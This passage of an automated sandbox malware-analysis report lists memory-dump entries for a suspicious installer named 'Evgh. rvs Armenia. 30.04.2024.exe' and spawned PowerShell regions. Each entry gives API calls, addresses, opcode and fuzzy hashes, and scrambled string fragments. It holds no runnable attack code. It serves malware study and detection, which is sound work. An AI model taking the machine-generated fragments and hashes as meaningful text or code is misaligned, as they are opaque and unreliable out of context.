                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-823278215
                                                  • Opcode ID: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                  • Instruction ID: 023f7408ada8d5c1aeddc6a893877c5a2de12b35a8757b47b9c38e9f0213d55a
                                                  • Opcode Fuzzy Hash: b93cf1ceae9b045ecd4922b716e1fc9cbd1c977ad46d60c8ebcd99b8bca78654
                                                  • Instruction Fuzzy Hash: BCD0A972605A30BAE21237169C09E8B2A0CCF82308B148023F200B72A2C63C4D028BFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4F
                                                    • Part of subcall function 00404F16: lstrlenA.KERNEL32(00402FCF,rghtten,00000000,0040E8D8,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5F
                                                    • Part of subcall function 00404F16: lstrcatA.KERNEL32(rghtten,00402FCF,00402FCF,rghtten,00000000,0040E8D8,00000000), ref: 00404F72
                                                    • Part of subcall function 00404F16: SetWindowTextA.USER32(rghtten,rghtten), ref: 00404F84
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC4
                                                    • Part of subcall function 00404F16: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FD2
                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2987980305-0
                                                  • Opcode ID: 52df7654dc3924a884bdee5c1e69637ec69d5130e206377a6ff2100b38ff3c47
                                                  • Instruction ID: b68841798668a23a4ff443840be3121a405d120f2a8fc72f381fb15ba3c401f2
                                                  • Opcode Fuzzy Hash: 52df7654dc3924a884bdee5c1e69637ec69d5130e206377a6ff2100b38ff3c47
                                                  • Instruction Fuzzy Hash: 72212E72904215FBDF217F648E4DA6E7670AB45318F30423BF301B52D0D7BD49419A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                  • Instruction ID: 2730d2a3776e1339b9346d87ab19af6b7380862a528adabe40aaf425641bd1fc
                                                  • Opcode Fuzzy Hash: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                  • Instruction Fuzzy Hash: 68F054B090A270ABD621BF20FE4C99F7B74E7447117124476F004B21A4C67898C1CBAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00405CFD: lstrcpynA.KERNEL32(?,?,00000400,0040318B,00422F20,NSIS Error), ref: 00405D0A
                                                    • Part of subcall function 00405808: CharNextA.USER32(?,?,00421128,?,00405874,00421128,00421128,75923410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405816
                                                    • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040581B
                                                    • Part of subcall function 00405808: CharNextA.USER32(00000000), ref: 0040582F
                                                  • lstrlenA.KERNEL32(00421128,00000000,00421128,00421128,75923410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B0
                                                  • GetFileAttributesA.KERNEL32(00421128,00421128,00421128,00421128,00421128,00421128,00000000,00421128,00421128,75923410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 004058C0
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040585D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-823278215
                                                  • Opcode ID: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                  • Instruction ID: 909c8d3fd404249b72f59da3ca6e13a8b26d043f1499ff833ea169d8e7c403dc
                                                  • Opcode Fuzzy Hash: cb887608a337bef365f075dbf4ed65c84e1b2a1d2ee6f30722e64456f73e84bd
                                                  • Instruction Fuzzy Hash: FCF02823104D6121D63632361C05EAF1A84CD87364B28813BFC51B12D1CA3CC863DD7E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00404EB9
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                    • Part of subcall function 00403F2E: SendMessageA.USER32(00010470,00000000,00000000,00000000), ref: 00403F40
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                  • Instruction ID: 4911906597f3eaa4ffbe68f0188cda158002c4f31c253b535ba85266db60279e
                                                  • Opcode Fuzzy Hash: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                  • Instruction Fuzzy Hash: DC0175B110020DABDB205F52EC81AAB3625F7C4751F204037FB01756D1C7399C51AAB9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,75923410,00000000,C:\Users\user\AppData\Local\Temp\,004035C0,004033DA,?), ref: 00403602
                                                  • GlobalFree.KERNEL32(00000000), ref: 00403609
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004035E8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-823278215
                                                  • Opcode ID: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                  • Instruction ID: d46364a902ea990bd632c56cfb9f57f9e2cdd9ba0813e856c63e7cee72968c4e
                                                  • Opcode Fuzzy Hash: 1acdd7952de975a5de59207208c6b073b3c222a5b17fc555175c0845e7698c1d
                                                  • Instruction Fuzzy Hash: 93E0EC32915120ABC7225F65ED04B9ABBA87B49B26F09006BF9407B3A08B746D425AD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 004057BC
                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 004057CA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-1246513382
                                                  • Opcode ID: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                  • Instruction ID: 18ef7b42b2ca9dadb34ddb0bde1cbbab447e34e044d1250ac1c79b5d16d3cc30
                                                  • Opcode Fuzzy Hash: 34bcb0359ecd18d08228093df84e7486f7a8c477fb5e2f0dc73f73f3b7a35111
                                                  • Instruction Fuzzy Hash: 8ED0A762418D70AEF30362109C04B8F6A58CF13700F194463E040A7190C2784C414BFD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058FD
                                                  • CharNextA.USER32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590E
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                  • Instruction ID: 18e4c75142147f65de27112721ce36ab9a51ac25249ca18f40cf651f68c78b39
                                                  • Opcode Fuzzy Hash: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                  • Instruction Fuzzy Hash: 01F0F632505414FFCB029FA4DD00D9EBBA8DF05360B2540B5F800F7250D234EE01AB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$4'jq$4'jq$4'jq$4'jq$4Il$4Il$tL>k$tL>k$tL>k$tL>k$x.=k$x.=k$x.=k$-=k$-=k
                                                  • API String ID: 0-2989419221
                                                  • Opcode ID: 13ccc9bc1e420d96b5b4b2ba58260f1f81c9a5d576af83f480d2c27c4b38f3df
                                                  • Instruction ID: 7d2c9c6d4ec4c5aff0f914dd1894707f6cdc4235118b9f8e10d309b2c4141222
                                                  • Opcode Fuzzy Hash: 13ccc9bc1e420d96b5b4b2ba58260f1f81c9a5d576af83f480d2c27c4b38f3df
                                                  • Instruction Fuzzy Hash: 7DF262B8B00218CFDB64DB64C951FAAB7B6EF85308F108499D909AB351CB75ED81CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Vj
                                                  • API String ID: 0-3251626932
                                                  • Opcode ID: 07a893a172913ac419ff02124bb95b4f9aa8d6d199dbdec547e2145144b20d17
                                                  • Instruction ID: be7236910b3d6c334d06bd7c5e1bc54951a4a53e7e1e50f3a15fdc656fe79096
                                                  • Opcode Fuzzy Hash: 07a893a172913ac419ff02124bb95b4f9aa8d6d199dbdec547e2145144b20d17
                                                  • Instruction Fuzzy Hash: 67B14E70E00209EFDF15CFAAC8857ADBBF6BF88314F14853AD415A7258EB75A845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2969482730.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_49e0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bd3122a5b5bc8606d836d552933b1ba4ed205d53c09878e07f60c3b21bd02a54
                                                  • Instruction ID: 92a77199562e9532f633c2e8b463e01ee991993367c848f0bbe918d58177cd4a
                                                  • Opcode Fuzzy Hash: bd3122a5b5bc8606d836d552933b1ba4ed205d53c09878e07f60c3b21bd02a54
                                                  • Instruction Fuzzy Hash: 42B17570E00209EFDF11CFAAC9917ADBBF6AF48314F14853AD455EB258EB74A845CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$4'jq$4'jq$tL>k$tL>k$x.=k$x.=k$-=k$-=k
                                                  • API String ID: 0-2913975060
                                                  • Opcode ID: 5a3383140ccd80c63875603d60d3d55f727ada0b02f5c9cd497d48d0183e70f3
                                                  • Instruction ID: 769d8842e783c0db1cb2cb5aabb0f4e42c653aa69c75f56c525860214bde28ed
                                                  • Opcode Fuzzy Hash: 5a3383140ccd80c63875603d60d3d55f727ada0b02f5c9cd497d48d0183e70f3
                                                  • Instruction Fuzzy Hash: 78B284B8B00214DFD764DB64C991FAAB7B2EF89304F108499D9096B351CB75ED82CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.=k$-=k
                                                  • API String ID: 0-1878986178
                                                  • Opcode ID: 7007a2f37f250bcc70c20ae78562e2f2503a6b38094ef0c1bbd2f62f59918cf4
                                                  • Instruction ID: ee7f288c7b63a0149844b55a5ed41fe5f9fcfcd54a5ef864289082f5c518d3bf
                                                  • Opcode Fuzzy Hash: 7007a2f37f250bcc70c20ae78562e2f2503a6b38094ef0c1bbd2f62f59918cf4
                                                  • Instruction Fuzzy Hash: A892D474B40215CFD724DB68C951FAABBB6EF85308F11C4AAD809AB355CB31ED41CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$tL>k$x.=k$-=k
                                                  • API String ID: 0-1657992861
                                                  • Opcode ID: a0a5f2ddcebbed16cf170331c9f608e6f990d559f3c7ad9a75b1704c52cfd612
                                                  • Instruction ID: 0321d00d4dbddffe6caf6dc5e1503947531cb1664aa2551563911a214d127d65
                                                  • Opcode Fuzzy Hash: a0a5f2ddcebbed16cf170331c9f608e6f990d559f3c7ad9a75b1704c52cfd612
                                                  • Instruction Fuzzy Hash: 75728FB8B40215CFE724DB54C951FAAB7B6EB89304F1184A9D9097B351CB31ED418FA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$x.=k$-=k
                                                  • API String ID: 0-2386809903
                                                  • Opcode ID: d04760ac0ec55ec85c63e0d49b82c7aa9e2854433daccf6cf848477e1fa1cccd
                                                  • Instruction ID: 2f2670f919658ac586214a46b0fe5ea26615fe3c5c451f7d9df33a4e22caa3f0
                                                  • Opcode Fuzzy Hash: d04760ac0ec55ec85c63e0d49b82c7aa9e2854433daccf6cf848477e1fa1cccd
                                                  • Instruction Fuzzy Hash: 0B628CB4B40215CFE724DB58C951FAAB7B6EF89308F1184AAD9096B351CB31ED81CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$x.=k$-=k
                                                  • API String ID: 0-1394668944
                                                  • Opcode ID: 26af63da94f75c34f46603fc004e278ea2d7f82d7b47ac1d8fd66edaba2d32a7
                                                  • Instruction ID: a8856bae27785c15cad457557367b6c6927b539475e611c3730b04f5a7de99c2
                                                  • Opcode Fuzzy Hash: 26af63da94f75c34f46603fc004e278ea2d7f82d7b47ac1d8fd66edaba2d32a7
                                                  • Instruction Fuzzy Hash: B7328EB4B00215CFE724DB54C991FAAB7B6EF89308F1184A9D9097B751CB31ED418FA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2980963723.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7930000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$(fLl$4'jq$x.=k$-=k
                                                  • API String ID: 0-1394668944
                                                  • Opcode ID: 39936cd9662a25a254321d08eb18b0b5687198009ca543acc532199a18aeeae1
                                                  • Instruction ID: 58f59cc548fae2de4a43f20165552282a8956c03230d48282e6043339b7aa8e3
                                                  • Opcode Fuzzy Hash: 39936cd9662a25a254321d08eb18b0b5687198009ca543acc532199a18aeeae1
